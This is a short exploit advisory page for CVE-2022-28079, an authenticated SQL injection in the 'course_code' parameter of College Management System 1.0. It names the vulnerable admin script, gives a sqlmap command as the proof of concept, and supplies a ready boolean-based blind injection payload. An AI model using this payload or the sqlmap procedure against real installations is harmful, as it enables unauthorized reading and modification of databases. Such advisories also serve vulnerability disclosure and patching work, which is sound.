College management system 1.0 course_code sql injection (authenticated) Vulnerability / Exploit
/
/
/
Exploits / Vulnerability Discovered : 2022-05-12 |
Type : webapps |
Platform : php
This exploit / vulnerability College management system 1.0 course_code sql injection (authenticated) is for educational purposes only and if it is used you will do on your own risk!
[+] Code ...
# Exploit Title: College Management System - 'course_code' SQL Injection (Authenticated)
# Date: 2022-24-03
# Exploit Author: Eren Gozaydin
# Vendor Homepage: https://code-projects.org/college-management-system-in-php-with-source-code/
# Software Link: https://download.code-projects.org/details/1c3b87e5-f6a6-46dd-9b5f-19c39667866f
# Version: 1.0
# Tested on: Windows 10 Pro + PHP 8.0.11, Apache 2.4.51
# CVE: CVE-2022-28079
# References: https://nvd.nist.gov/vuln/detail/CVE-2022-28079
College Management System 1.0 allows SQL Injection via parameter 'course_code' in
/College-Management-System/admin/asign-single-student-subjects.php. Exploiting this issue could allow an attacker to compromise
the application, access or modify data, or exploit latent vulnerabilities
in the underlying database.
2. Proof of Concept:
----------------------
In Burpsuite intercept the request from the affected page with
'course_code' parameter and save it like poc.txt Then run SQLmap to extract the
data from the database:
sqlmap -r poc.txt --dbms=mysql
3. Example payload:
----------------------
boolean-based blind
Payload: submit=Press&roll_no=3&course_code=-6093' OR 2121=2121 AND 'ddQQ'='ddQQ